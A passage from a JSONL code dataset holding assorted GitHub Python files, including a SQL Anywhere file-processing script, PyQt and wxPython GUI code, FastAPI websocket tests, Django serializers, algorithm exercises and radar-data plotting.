: torch.Tensor\n input image\n conv_size : int, optional\n convolution size for maxpool, by default 8\n bs_threshold : int, optional\n bright spot threshold, by default 210\n\n Returns\n -------\n torch.Tensor\n bright spots with shape (2, 64, 64)\n \"\"\"\n maxpool = nn.MaxPool2d(conv_size, stride=conv_size, return_indices=True)\n pool, indices = maxpool(im.to(torch.float))\n mask = pool > bs_threshold\n masked_indices = indices[mask]\n row, col = unravel_index(masked_indices, [4096, 512])\n bright_spots_temp = torch.column_stack((row, col)).to(torch.float)\n bright_spots = torch.full((64 * 64, 2), torch.nan)\n bright_spots[: bright_spots_temp.shape[0], :] = bright_spots_temp\n return bright_spots.permute(1, 0).view(2, 64, 64)\n","repo_name":"tstreule/SIPS","sub_path":"sips/data_extraction/utils/image_operations.py","file_name":"image_operations.py","file_ext":"py","file_size_in_byte":1824,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"40467705169","text":"import pyodbc\r\nfrom datetime import datetime, date\r\nfrom shutil import move, copy\r\nfrom subprocess import Popen, PIPE, STDOUT\r\nfrom logging import basicConfig, info, error, DEBUG\r\nfrom os import path, walk, rename\r\n\r\ndef start():\r\n print(f'INICIO: {datetime.now()}')\r\n dsn_aux = 'DSN=AUX'\r\n dir_init = 'C:\\\\Compare\\\\'\r\n dir_file_origin = f'\\\\\\\\Servername\\\\C$\\\\REQUESTS\\\\' #copio requests.sql.old do servidor de origem\r\n dir_file_pending = f'{dir_init}\\\\idle\\\\' #grava no servidor para processar\r\n dir_file_done = f'{dir_init}\\\\done\\\\' #bkp dos ja processados\r\n log_dir = f'{dir_init}\\\\logs\\\\'\r\n filename = 'requests.sql.old'\r\n \r\n if_log_file_not_exits_then_created( log_dir )\r\n message_start()\r\n\r\n #verifica o valor sequencial pare renomear o arquivo\r\n dir_list = [ dir_file_pending, dir_file_done ]\r\n maxfileseq = get_max_seq( dir_list )\r\n fileseq = str(int(maxfileseq) + 1).zfill(3)\r\n print(f'maxfileseq: {fileseq}')\r\n\r\n request = Request(filename, '', True, dsn_aux, '')\r\n \r\n #STEP 1 - buscar e mover o arquivo request.sql.old do servidor A para servidor B\r\n move_file(request, dir_file_origin, dir_file_pending, request.filename)\r\n\r\n #STEP 2 - renomear o arquivo request_old.sql acrescentando um sequencial exemplo: request.sql.old_001\r\n add_seq_file_name(request, dir_file_pending, fileseq) if request.status else message_error_step_before(request, True)\r\n\r\n #STEP 3 - carregar dados no banco aux\r\n #execute_sql(request, request.dsn, request.filename_seq, dir_file_pending) if request.status else message_error_step_before(request, False)\r\n\r\n #STEP 4 - mover o arquivo processado para pasta processado\r\n #move_file(request, dir_file_pending, dir_file_done, request.filename_seq) if request.status else message_error_step_before(request, True)\r\n\r\n #STEP 5 - verificar se existem outros arquivos pendentes de processamento\r\n file_list = get_other_file_to_process(request, dir_file_pending) if request.status else message_error_step_before(request, False)\r\n\r\n #STEP 6 - se existir arquivos pendentes, processar todos, se um falhar, seguir para o proximo\r\n if file_list:\r\n execute_all_sql(request, file_list, dir_file_pending, dir_file_done) \r\n \r\n print(f'Request: {request}')\r\n #FIM\r\n message_end(request)\r\n\r\ndef execute_command(process, command):\r\n proc = Popen(command, stdout=PIPE, stderr=STDOUT)\r\n stdout, stderr = proc.communicate()\r\n message = f' {stdout} - {stderr}'\r\n process.write_message_and_write_log(f' RETORNO => {message}')\r\n info('') \r\n return message\r\n\r\ndef execute_sql(request, dsn_name, script_name, dir_script):\r\n cmd_sql = f\"C:\\\\Program Files\\\\SQL Anywhere 16\\\\Bin64\\\\dbisql -c {dsn_name} -d1 -nogui -onerror continue -codepage 1252 call MigrateStatement('{dir_script}{script_name}')\"\r\n request.write_message_and_write_log(f' COMADO SQL: {cmd_sql}')\r\n message = execute_command(request, cmd_sql)\r\n\r\n if \"Database server not found\" in str(message):\r\n request.write_message_and_write_log(f' ERRO na execucao do script SQL: {script_name}, executado no DSN: {dsn_name}, verificar se o ODBC esta configurado corretamente.', 'ERROR')\r\n request.status = False \r\n elif ( (\"b''\" in str(message)) or (\"Execution time:\" in str(message)) ):\r\n request.write_message_and_write_log(f' Script SQL: {script_name}, executado no {dsn_name}, com SUCESSO.')\r\n request.status = True\r\n else:\r\n request.write_message_and_write_log(f' ERRO na execucao do script SQL: {script_name}, executado no DSN: {dsn_name}, orrigir antes de continuar.', 'ERROR')\r\n request.status = False\r\n\r\ndef execute_all_sql(request, file_list, dir_file_pending, dir_file_done):\r\n try:\r\n for f_list in file_list:\r\n execute_sql(request, request.dsn, f_list, dir_file_pending)\r\n if request.status:\r\n #os processados com sucesso, mover o arquivo para pasta processado\r\n move_file(request, dir_file_pending, dir_file_done, f_list)\r\n except Exception as e:\r\n error = f'ERRO Execute Query: {str(e)}'\r\n return error\r\n\r\ndef get_other_file_to_process(request, dir_file_pending):\r\n file_list = get_files_list(dir_file_pending)\r\n if file_list:\r\n request.write_message_and_write_log(f'Arquivos encontrados: {file_list}')\r\n else:\r\n request.write_message_and_write_log(f'Nao ha arquivos pendentes de processamento.')\r\n\r\n return file_list\r\n\r\ndef add_seq_file_name(request, dir_file, fileseq):\r\n file_dir_name = f'{dir_file}{request.filename}'\r\n file_name_new = f'{request.filename}_{fileseq}'\r\n if verify_if_file_exist(file_dir_name):\r\n request.filename_seq = rename_file(request, dir_file, request.filename, file_name_new)\r\n else:\r\n request.write_message_and_write_log('Nenhum arquivo encontrato para acrescentar sequencial')\r\n\r\ndef rename_file(request, dir_file, file_name_old, file_name_new):\r\n file_dir_name_old = f'{dir_file}{file_name_old}'\r\n file_dir_name_new = f'{dir_file}{file_name_new}'\r\n try:\r\n rename(file_dir_name_old, file_dir_name_new)\r\n request.write_message_and_write_log(f'Arquivo renomeado com SUCESSO para: {file_name_new}')\r\n return file_name_new\r\n except Exception as e:\r\n request.status = False\r\n request.write_message_and_write_log(f'ERRO ao renomear o arquivo {file_dir_name_old} : . {str(e)} ', 'ERROR')\r\n return '' \r\n\r\ndef message_error_step_before(request, status):\r\n request.write_message_and_write_log('{:>^100}'.format( f'*' ))\r\n request.write_message_and_write_log('{:=^100}'.format( f'WARNING Verificar o passo anterior.' ))\r\n request.write_message_and_write_log('{:<^100}'.format( f'*' ))\r\n request.status = status\r\n\r\ndef message_start():\r\n info('{:=^100}'.format( f'INICIO: {datetime.now()} ' ))\r\n print(f'INICIO: {datetime.now()}')\r\n\r\ndef message_end(request):\r\n request.write_message_and_write_log('{:=^100}'.format( f'FIM: {datetime.now()} ' ))\r\n print(f'FIM: {datetime.now()}')\r\n quit()\r\n\r\ndef get_max_seq(dir_list):\r\n list_file = []\r\n list_value = []\r\n\r\n for directory in dir_list: \r\n list_file.extend(get_files_list(directory))\r\n\r\n for file_value in list_file:\r\n list_value.append(file_value[17:])\r\n\r\n max_value = max(list_value)\r\n return max_value\r\n\r\ndef get_files_list(dir_file):\r\n for _, _, files in walk(dir_file):\r\n return files \r\n\r\ndef move_file(request, server_origin, server_destiny, filename):\r\n file_dir_origin = f'{server_origin}{filename}' \r\n if verify_if_file_exist(file_dir_origin):\r\n request.write_message_and_write_log(f' Arquivo: {file_dir_origin} encontrado, movendo...') \r\n try:\r\n move(file_dir_origin, server_destiny)\r\n except Exception as e:\r\n request.write_message_and_write_log(f' ERRO ao tentar mover o arquivo: {file_dir_origin} para: {server_destiny} => Menssagem de erro: {str(e)}', 'ERROR')\r\n request.status = False\r\n else:\r\n request.write_message_and_write_log(f' SUCESSO na mover do arquivo: {file_dir_origin} para: {server_destiny} .')\r\n request.status = True \r\n else:\r\n request.write_message_and_write_log(f' Arquivo: {file_dir_origin} , nao encontrado para mover.')\r\n request.status = False\r\n\r\ndef verify_if_file_exist(file_dir_name):\r\n return True if path.exists(file_dir_name) else False\r\n\r\ndef if_log_file_not_exits_then_created(log_dir):\r\n today = str(date.today())\r\n log_file = f'REQUEST_{today}.log'\r\n log_level = DEBUG\r\n output_format = '%(asctime)s - %(levelname)s : %(message)s'\r\n filename = f'{log_dir}{log_file}'\r\n basicConfig(filename=filename, level=log_level, format=output_format)\r\n\r\nclass Request():\r\n def __init__( self, filename, message, status, dsn, filename_seq ):\r\n self.__filename = filename\r\n self.__message = message\r\n self.__status = status\r\n self.__dsn = dsn\r\n self.__filename_seq = filename_seq\r\n\r\n @property\r\n def filename(self):\r\n return self.__filename\r\n\r\n @filename.setter\r\n def filename(self, filename):\r\n self.__filename = filename\r\n\r\n @property\r\n def message(self):\r\n return self.__message\r\n\r\n @message.setter\r\n def message(self, message):\r\n self.__message = message \r\n\r\n @property\r\n def status(self):\r\n return self.__status\r\n\r\n @status.setter\r\n def status(self, status):\r\n self.__status = status \r\n\r\n @property\r\n def dsn(self):\r\n return self.__dsn\r\n\r\n @dsn.setter\r\n def dsn(self, dsn):\r\n self.__dsn = dsn \r\n\r\n @property\r\n def filename_seq(self):\r\n return self.__filename_seq\r\n\r\n @filename_seq.setter\r\n def filename_seq(self, filename_seq):\r\n self.__filename_seq = filename_seq\r\n\r\n def __str__(self):\r\n return f'''\r\n filename: {self.__filename},\r\n message: {self.__message},\r\n status: {self.__status},\r\n dsn: {self.__dsn},\r\n filename_seq: {self.__filename_seq}\r\n '''\r\n def write_message_and_write_log(self, message, log_type='INFO'):\r\n error(f'\\n{message}') if (log_type == 'ERROR') else info(f'\\n{message}')\r\n self.__message = f'{self.__message}{message} \\n'\r\n print(message)\r\n\r\nif __name__ == \"__main__\":\r\n start()\r\n","repo_name":"Andersonsjc/database","sub_path":"SQLAnyWhere_Test_update/DBRequest.py","file_name":"DBRequest.py","file_ext":"py","file_size_in_byte":9529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32321833717","text":"from PyQt5 import QtCore, QtGui, QtWidgets\r\nfrom PyQt5.QtWidgets import QMessageBox\r\nimport sys\r\nimport csv \r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\n\r\n\r\nsys.path.insert(0, '../DAL')\r\nfrom handler import DataHandler\r\ndh = DataHandler('../patient.db')\r\n\r\n\r\nsys.path.insert(0, '../UI')\r\nimport valueEdit\r\n\r\nclass Main(QtWidgets.QMainWindow, valueEdit.Ui_editValues):\r\n\tdef __init__(self):\r\n\t\tsuper(Main, self).__init__()\r\n\t\tself.setupUi(self)\r\n\t\tself.saveValues_btn.clicked.connect(self.changeAbnormalityValues)\r\n\r\n\t\tself.lowRespi = dh.getLowRespiValues()\r\n\t\tself.highRespi = dh.getHighRespiValues()\r\n\t\tself.lowHeart = dh.getLowHeartValues()\r\n\t\tself.highHeart = dh.getHighHeartValues()\r\n\r\n\t\tself.lowRespiMin_blank.setText(str(self.lowRespi[0]))\r\n\t\tself.lowRespiMax_blank.setText(str(self.lowRespi[1]))\r\n\t\tself.highRespiMin_blank.setText(str(self.highRespi[0]))\r\n\t\tself.highRespiMax_blank.setText(str(self.highRespi[1]))\r\n\t\tself.lowHeartMin_blank.setText(str(self.lowHeart[0]))\r\n\t\tself.lowHeartMax_blank.setText(str(self.lowHeart[1]))\r\n\t\tself.highHeartMin_blank.setText(str(self.highHeart[0]))\r\n\t\tself.highHeartMax_blank.setText(str(self.highHeart[1]))\r\n\r\n\r\n\r\n\tdef changeAbnormalityValues(self):\r\n\t\ttry:\r\n\t\t\tself.rLow_min = int(self.lowRespiMin_blank.text())\r\n\t\t\tself.rLow_max = int(self.lowRespiMax_blank.text())\r\n\t\t\tself.rHigh_min = int(self.highRespiMin_blank.text())\r\n\t\t\tself.rHigh_max = int(self.highRespiMax_blank.text())\r\n\t\t\tself.hLow_min = int(self.lowHeartMin_blank.text())\r\n\t\t\tself.hLow_max = int(self.lowHeartMax_blank.text())\r\n\t\t\tself.hHigh_min = int(self.highHeartMin_blank.text())\r\n\t\t\tself.hHigh_max = int(self.highHeartMax_blank.text())\r\n\r\n\r\n\r\n\t\t\tdh.updateRangeForRespi(self.rLow_min,self.rLow_max,self.rHigh_min,self.rHigh_max)\r\n\t\t\tdh.updateRangeForHeart(self.hLow_min,self.hLow_max,self.hHigh_min,self.hHigh_max)\r\n\r\n\t\t\tmsg = QMessageBox()\r\n\t\t\tmsg.setWindowTitle(\"SUCCESS\")\r\n\t\t\tmsg.setText(\"Values are now updated!\")\r\n\t\t\tmsg.setIcon(QMessageBox.Information)\r\n\t\t\tx = msg.exec_()\r\n\t\texcept:\r\n\t\t\tmsg = QMessageBox()\r\n\t\t\tmsg.setWindowTitle(\"Error!\")\r\n\t\t\tmsg.setText(\"Input is invalid!\")\r\n\t\t\tmsg.setIcon(QMessageBox.Critical)\r\n\t\t\tx = msg.exec_()\r\n\r\n\t\r\n \r\n\r\n \r\n\r\nif __name__ == '__main__':\r\n app = QtWidgets.QApplication(sys.argv)\r\n form = Main()\r\n form.show()\r\n sys.exit(app.exec_())","repo_name":"jm18reyes/Respiratory-and-Heart-Rate-Analyzer","sub_path":"BLL/editValuePage.py","file_name":"editValuePage.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"28144250267","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\nWrite a program that outputs the string representation of numbers from 1 to n.\n\nBut for multiples of three it should output “Fizz” instead of the number and for the multiples of five output “Buzz”. For numbers which are multiples of both three and five output “FizzBuzz”.\n\nExample:\n\nn = 15,\n\nReturn:\n[\n \"1\",\n \"2\",\n \"Fizz\",\n \"4\",\n \"Buzz\",\n \"Fizz\",\n \"7\",\n \"8\",\n \"Fizz\",\n \"Buzz\",\n \"11\",\n \"Fizz\",\n \"13\",\n \"14\",\n \"FizzBuzz\"\n]\n\"\"\"\nfrom typing import List\n\n\nclass Solution:\n def fizzBuzz(self, n: int) -> List[str]:\n result = list()\n for i in range(1, n + 1):\n if not i % (3 * 5):\n result.append(\"FizzBuzz\")\n elif not i % 3:\n result.append(\"Fizz\")\n elif not i % 5:\n result.append(\"Buzz\")\n else:\n result.append(str(i))\n\n return result\n\n\nif __name__ == '__main__':\n a = Solution()\n print(a.fizzBuzz(15))\n","repo_name":"heianhu/DataStructuresAndAlgorithm","sub_path":"算法/Leetcode/Easy/8.Math/1.Fizz Buzz.py","file_name":"1.Fizz Buzz.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"8267439583","text":"import sys\ninput = sys.stdin.readline\n\n\ndef getGraph():\n n = int(input())\n A = [None for _ in range(n+1)]\n A[0] = [-1 for _ in range (n+1)]\n for i in range(1,n+1):\n A[i] = [-1] + list(map(int,input().split()))\n return n,A\n\n\ndef isConnected(n,A):\n queue = [0]\n not_visited = set([i for i in range(n)])\n while bool(queue):\n v = queue.pop()\n not_visited.discard(v)\n for i in range(n):\n if A[v][i]:\n if i in not_visited:\n queue.append(i)\n return not bool(not_visited)\n\n\ndef findPath(a,b,n,A): # BFS\n queue = [a]\n visited = set([])\n I = [-1 for _ in range(n+1)]\n while bool(queue):\n v = queue.pop(0)\n visited.add(v)\n for i in range(1,n+1):\n if A[v][i] and i not in visited:\n I[i] = v\n if i == b: # arrived\n R = [b]\n prev = b\n while True:\n prev = I[prev]\n R.append(prev)\n if prev == a:\n return list(R.__reversed__())\n queue.append(i)\n\n return None\n\n\ndef main():\n n,A = getGraph() # n is |V|, A is adjacency graph\n for i in range(n): # even degree check\n if sum(A[i]) & 1:\n return False\n cycle = [0]\n while True:\n start = cycle[-1]\n for i in range(n):\n if A[start][i]:\n pass\n\nn,A = getGraph()\nprint(A)\nprint(findPath(1,4,n,A))","repo_name":"3-24/problem-solving","sub_path":"baekjoon/11403.py","file_name":"11403.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"40505489036","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 11 16:00:44 2020\n\n@author: noahbrauer\n\"\"\"\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 24 18:37:21 2020\n\n@author: noahbrauer\n\"\"\"\n\nimport netCDF4\nimport gzip\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport os\nimport conda\n\nconda_file_dir = conda.__file__\nconda_dir = conda_file_dir.split('lib')[0]\nproj_lib = os.path.join(os.path.join(conda_dir, 'share'), 'proj')\nos.environ[\"PROJ_LIB\"] = proj_lib\n\nfrom mpl_toolkits.basemap import Basemap\nfrom mpl_toolkits.basemap import shiftgrid\nimport pyart\nimport seaborn as sns\n\n\nwith gzip.open('GRtoDPR.KTLX.150617.7390.V06A.KU.NS.1_21.nc.gz') as gz:\n with netCDF4.Dataset('file', mode = 'r', memory=gz.read()) as nc:\n print(nc.variables)\n latitude = nc.variables['latitude'][:].T\n longitude = nc.variables['longitude'][:].T\n z = nc.variables['ZFactorCorrected'][:]\n #zdr = nc.variables['']\n elev_angle = nc.variables['timeSweepStart'][:]\n\n\n\nelev_angle = 0\nz_lowest = z[elev_angle,:]\n#z_lowest[z_lowest<=0] = np.nan\n\n\n\n\n\n#%%\n\n#from matplotlib.colors import ListedColormap\n\ncolormap = ['white','dodgerblue', 'deepskyblue', 'lawngreen', 'lightgreen', 'green', 'gold', 'darkorange', 'red', 'firebrick']\n\nz_color = np.empty(667,dtype = 'str')\nz_color = []\n\n#for i in range(len(z_color)):\nfor i in range(len(z_lowest)):\n\n if z_lowest[i]<=5:\n #z_color[i] = colormap[0]\n z_color.append(colormap[0])\n \n elif z_lowest[i]>5 and z_lowest[i]<=10:\n #z_color[i] = colormap[1]\n z_color.append(colormap[1])\n \n elif z_lowest[i]>10 and z_lowest[i]<=15:\n #z_color[i] = colormap[2]\n z_color.append(colormap[2])\n \n elif z_lowest[i]>15 and z_lowest[i]<=20:\n #z_color[i] = colormap[3]\n z_color.append(colormap[3])\n \n elif z_lowest[i]>20 and z_lowest[i]<=25:\n #z_color[i] = colormap[4]\n z_color.append(colormap[4])\n \n elif z_lowest[i]>25 and z_lowest[i]<=30:\n #z_color[i] = colormap[5]\n z_color.append(colormap[5])\n \n elif z_lowest[i]>30 and z_lowest[i]<=35:\n #z_color[i] = colormap[6]\n z_color.append(colormap[6])\n \n elif z_lowest[i]>35 and z_lowest[i]<=40:\n #z_color[i] = colormap[7]\n z_color.append(colormap[7])\n \n elif z_lowest[i]>40 and z_lowest[i]<=45:\n #z_color[i] = colormap[8]\n z_color.append(colormap[8])\n \n elif z_lowest[i] == -100:\n #z_color[i] = colormap[0]\n z_color.append(colormap[0])\n \n \nfrom matplotlib.colors import ListedColormap\ncmap_z = ListedColormap(colormap) \n \n\n\n\n#%%\nimport matplotlib\n\nelev_angle = 0\n#Setup plotting \ncmin = 0; cmax = 50; cint = 5; clevs = np.round(np.arange(cmin,cmax,cint),2)\nnlevs = len(clevs) - 1; cmap = plt.get_cmap(name=cmap_z,lut=nlevs)\n\ncolour_norm_object = matplotlib.colors.Normalize(vmin=cmin, vmax=cmax, clip=False)\nscalar_mappable_object = plt.cm.ScalarMappable(cmap=cmap, norm=colour_norm_object)\nscalar_mappable_object.set_array(z_color)\n\nfigure_object, axes_object = plt.subplots(1, 1, figsize=(10, 10))\n\nc = plt.scatter(longitude[:, elev_angle], latitude[:, elev_angle], c = z_color, vmin = 0, vmax = 50, cmap = cmap, edgecolors = 'none')\n\n\nfor i in range(len(z_color)):\n if z_color[i] ==0: \n c2 = plt.scatter(longitude[i,elev_angle], latitude[i,elev_angle], edgecolors = 'k', facecolors = 'none')\n \n \nplt.xlabel('Longitude', size = 24)\nplt.ylabel('Latitude', size = 24)\nplt.title(r'KTLX $0.5^{o}$ $Z_{H}$ 6/17 0739 UTC ',name='Calibri',size=26)\n\ncolour_bar_object = plt.colorbar(ax=axes_object, mappable=scalar_mappable_object, orientation='vertical')\n\ncolour_bar_object.set_label('dBZ', size = 24)\n\nplt.show()\nplt.close(figure_object)\n\n\n","repo_name":"nbrauer93/TS_Bill","sub_path":"VN_KTLX.py","file_name":"VN_KTLX.py","file_ext":"py","file_size_in_byte":3825,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"10865753629","text":"import pytest\nfrom fastapi import FastAPI\nfrom fastapi.testclient import TestClient\n\nfrom socketsundso import WebSocketHandlingEndpoint, event\nfrom socketsundso.handler import Handler\n\napp = FastAPI()\n\n\n@app.websocket(\"/\")\nclass WSApp(WebSocketHandlingEndpoint):\n @event\n def decorator_without_parantheses(self):\n return {\"type\": \"hello_world\"}\n\n @event()\n async def decorator_with_parantheses(self):\n return {\"type\": \"hello_world\"}\n\n @event(\"decorator_with_parentheses_event\")\n async def decorator_with_parantheses_and_event(self):\n return {\"type\": \"hello_world\"}\n\n @event\n @staticmethod\n async def static_async_method():\n return {\"type\": \"hello_world\"}\n\n @event\n @staticmethod\n def static_method():\n return {\"type\": \"hello_world\"}\n\n @event\n async def async_with_arg(self, msg: str):\n return {\"reply\": msg}\n\n @event\n def with_arg(self, msg: str):\n return {\"reply\": msg}\n\n\n@WSApp.event\nasync def class_decorator_without_parantheses():\n return {\"type\": \"hello_world\"}\n\n\n@WSApp.event()\nasync def class_decorator_with_parantheses():\n return {\"type\": \"hello_world\"}\n\n\n@WSApp.event(\"class_decorator_with_parentheses_event\")\nasync def class_decorator_with_parantheses_and_event():\n return {\"type\": \"hello_world\"}\n\n\n@event\nasync def decorator_outside_class():\n return {\"type\": \"hello_world\"}\n\n\n@event\nasync def decorator_outside_class_attached():\n return {\"type\": \"hello_world\"}\n\n\nasync def function_without_decorator():\n return {\"type\": \"hello_world\"}\n\n\nWSApp.attach_handler(decorator_outside_class_attached)\nWSApp.attach_handler(Handler(method=function_without_decorator))\nWSApp.attach_handler(\n Handler(event=\"function_without_decorator_event\", method=function_without_decorator)\n)\n\nclient = TestClient(app)\n\n\n@pytest.mark.parametrize(\n \"event,expected_response\",\n [\n (\"decorator_without_parantheses\", {\"type\": \"hello_world\"}),\n (\"decorator_with_parantheses\", {\"type\": \"hello_world\"}),\n (\"decorator_with_parentheses_event\", {\"type\": \"hello_world\"}),\n (\"class_decorator_without_parantheses\", {\"type\": \"hello_world\"}),\n (\"class_decorator_with_parantheses\", {\"type\": \"hello_world\"}),\n (\"class_decorator_with_parentheses_event\", {\"type\": \"hello_world\"}),\n (\"function_without_decorator\", {\"type\": \"hello_world\"}),\n (\"function_without_decorator_event\", {\"type\": \"hello_world\"}),\n (\"decorator_outside_class_attached\", {\"type\": \"hello_world\"}),\n (\"static_method\", {\"type\": \"hello_world\"}),\n ],\n)\ndef test_events(event, expected_response):\n with client.websocket_connect(\"/\") as websocket:\n websocket.send_json({\"type\": event})\n data = websocket.receive_json()\n assert data == expected_response\n\n\n@pytest.mark.parametrize(\n \"event\",\n [\n (\"decorator_with_parantheses_and_event\"),\n (\"class_decorator_with_parantheses_and_event\"),\n (\"nonexistant\"),\n (\"decorator_outside_class\"),\n ],\n)\ndef test_nonexistant_events(event):\n with client.websocket_connect(\"/\") as websocket:\n websocket.send_json({\"type\": event})\n data = websocket.receive_json()\n assert \"errors\" in data\n assert data[\"errors\"][0][\"ctx\"][\"given\"] == event\n\n\n@pytest.mark.parametrize(\n \"event,args,expected_response\",\n [\n (\n \"async_with_arg\",\n {\"msg\": \"foobar\"},\n {\"type\": \"async_with_arg\", \"reply\": \"foobar\"},\n ),\n (\"with_arg\", {\"msg\": \"foobar\"}, {\"type\": \"with_arg\", \"reply\": \"foobar\"}),\n ],\n)\ndef test_with_param(event, args, expected_response):\n with client.websocket_connect(\"/\") as websocket:\n websocket.send_json({\"type\": event, **args})\n data = websocket.receive_json()\n assert data == expected_response\n","repo_name":"dingensundso/socketsundso","sub_path":"tests/test_decorators.py","file_name":"test_decorators.py","file_ext":"py","file_size_in_byte":3833,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"71449844675","text":"from itertools import product\n# from typing_extensions import Required\nfrom unittest.util import _MAX_LENGTH\nfrom rest_framework.exceptions import ValidationError\nfrom django.http import request\nfrom rest_framework import serializers\nfrom .models import Category, Tag, Review, Product\n\n\nclass CategorySerializer(serializers.ModelSerializer):\n class Meta:\n model = Category\n fields = ['name']\n\n\nclass TagSerializer(serializers.ModelSerializer):\n class Meta:\n model = Tag\n fields = ['name']\n\n\nclass ReviewSerializer(serializers.ModelSerializer):\n class Meta:\n model = Review\n fields = ['text']\n\n\nclass ProductListSerializer(serializers.ModelSerializer):\n class Meta:\n model = Product\n fields = ['id', 'title']\n\n\nclass ProductDetailSerializer(serializers.ModelSerializer):\n category = CategorySerializer()\n tags = TagSerializer(many=True)\n reviews = ReviewSerializer(many=True)\n\n class Meta:\n model = Product\n fields = ['title', 'description', 'price', 'category', 'tags', 'reviews']\n\n\nclass ProductReviewSerializer(serializers.ModelSerializer):\n reviews = ReviewSerializer(many=True)\n\n class Meta:\n model = Product\n fields = ['id', 'title', 'reviews']\n\n\nclass ProductTagsSerializer(serializers.ModelSerializer):\n tags = serializers.SerializerMethodField()\n\n class Meta:\n model = Product\n fields = 'id title tags'.split()\n\n def get_tags(self, product):\n active_tags = product.tags.filter(is_active=True)\n data = TagSerializer(active_tags, many=True).data\n return data\n\n\nclass ProductCreateSerializer(serializers.ModelSerializer):\n title = serializers.CharField(max_length=23)\n description = serializers.CharField(required=False)\n price = serializers.FloatField()\n category = serializers.IntegerField()\n tags = serializers.ListField()\n\n\n def validate(sefl, attrs):\n title = attrs['title']\n products =Product.objects.filter(title=title)\n if products:\n raise ValidationError('Product already exist!')\n","repo_name":"BeksBratan/DjangoShop","sub_path":"shop/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4234050829","text":"# Implement a MyQueue class which implements a queue using two stacks\n\n\nclass MinStack:\n def __init__(self):\n from array import array\n self.stack = array('d')\n self.pointer = -1\n self.mindex = []\n self.minptr = -1\n\n def pop(self):\n if self.pointer != -1:\n if self.pointer == self.mindex[self.minptr]:\n self.mindex.pop()\n self.minptr -= 1\n res = self.stack[self.pointer]\n self.stack.pop()\n self.pointer -= 1\n return res\n\n def push(self, item):\n self.stack.append(item)\n self.pointer += 1\n if self.minptr != -1:\n if item < self.stack[self.mindex[self.minptr]]:\n self.mindex.append(self.pointer)\n self.minptr += 1\n else:\n self.mindex.append(self.pointer)\n self.minptr += 1\n\n def min(self):\n if self.minptr != -1:\n return self.stack[self.mindex[self.minptr]]\n\n def peek(self):\n if self.pointer != -1:\n return self.stack[self.pointer]\n\n\nclass MyQueue:\n\n def __init__(self):\n self.old_stack = MinStack()\n self.new_stack = MinStack()\n\n def push(self, item):\n self.new_stack.push(item)\n\n def pop(self):\n while self.new_stack.pointer != -1:\n self.old_stack.push(self.new_stack.pop())\n return self.old_stack.pop()\n\n def peek(self):\n while self.new_stack.pointer != -1:\n self.old_stack.push(self.new_stack.pop())\n return self.old_stack.peek()\n\n\nif __name__ == \"__main__\":\n print(\"QueueStack\")\n l = MyQueue()\n for i in range(0,10000,100):\n l.push(i)\n for i in range(0,10000,100):\n print(l.pop())","repo_name":"Monata/CTCI_Python3_Solutions","sub_path":"CTCI_solutions/3.4_QueueStack.py","file_name":"3.4_QueueStack.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"31760021967","text":"import wx\n\n\ndef create_menu_item(menu, label, func):\n item = wx.MenuItem(menu, -1, label)\n menu.Bind(wx.EVT_MENU, func, id=item.GetId())\n menu.AppendItem(item)\n return item\n\n\nclass PromptingComboBox(wx.ComboBox):\n def __init__(self, *args, **kwargs):\n wx.ComboBox.__init__(self, *args, **kwargs)\n self.choices = []\n self.Bind(wx.EVT_TEXT, self.EvtText)\n self.Bind(wx.EVT_CHAR, self.EvtChar)\n self.Bind(wx.EVT_COMBOBOX, self.EvtCombobox)\n self.ignore_evt_text = False\n\n def EvtCombobox(self, event):\n self.ignore_evt_text = True\n event.Skip()\n\n def EvtChar(self, event):\n if event.GetKeyCode() == 8 or event.GetKeyCode() == 127:\n self.ignore_evt_text = True\n event.Skip()\n\n def EvtText(self, event):\n if self.ignore_evt_text:\n self.ignore_evt_text = False\n return\n currentText = event.GetString()\n found = False\n for choice in self.choices :\n if choice.startswith(currentText):\n self.ignore_evt_text = True\n self.SetValue(choice)\n self.SetInsertionPoint(len(currentText))\n self.SetMark(len(currentText), len(choice))\n found = True\n break\n if not found:\n event.Skip()","repo_name":"neowinx/chow-chow","sub_path":"gui/extra.py","file_name":"extra.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74357261314","text":"import os\nimport sys\nimport ntpath\nimport pandas as pd\nimport datavisualizer.models.custom_table_instance as cti\n\n\nclass ProjectInstance:\n def __init__(self, input_path, type_of_file):\n self.input_path = input_path\n self.type_of_file = type_of_file\n self.list_of_custom_table_instances = []\n self.path_to_icon = None\n self.path_to_csv_icon = os.path.join(os.getcwd(), 'datavisualizer', 'resources', 'images', 'icon.csv.60x60.png')\n self.path_to_excel_icon = os.path.join(os.getcwd(), 'datavisualizer', 'resources', 'images', 'icon.excel.60x60.png')\n self.plain_text_csv = 'csv'\n self.plain_text_excel = 'excel'\n self.file_name = self._set_file_name()\n self.init()\n\n def init(self):\n if self.type_of_file is self.plain_text_excel:\n self.path_to_icon = self.path_to_excel_icon\n 